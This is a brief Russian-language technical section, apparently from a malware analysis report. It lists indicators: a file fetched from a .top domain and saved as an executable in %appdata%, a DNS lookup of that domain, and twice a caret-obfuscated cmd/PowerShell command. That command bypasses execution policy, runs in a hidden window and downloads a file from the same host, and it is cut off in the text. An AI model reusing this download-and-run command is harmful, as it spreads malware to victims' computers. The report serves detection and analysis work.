Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWErS^hEl^L.exe -^EXeCu^tIONp^Ol^Icy^ ^B^ypA^S^s^ ^-NoPrO^fI^LE^ -w^in^dowStylE h^Idd^EN ^(^n^eW^-oBjE^cT s^yStEM.^n^et^.^WE^Bc^L^iENT).D^oWNLOAdfil^E^('http://www.fap...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "poWErS^hEl^L.exe -^EXeCu^tIONp^Ol^Icy^ ^B^ypA^S^s^ ^-NoPrO^fI^LE^ -w^in^dowStylE h^Idd^EN ^(^n^eW^-oBjE^cT s^yStEM.^n^et^.^WE^Bc^L^iENT).D^oWNLOAdfil^E^('http://www.fap...' (со скрытым окном)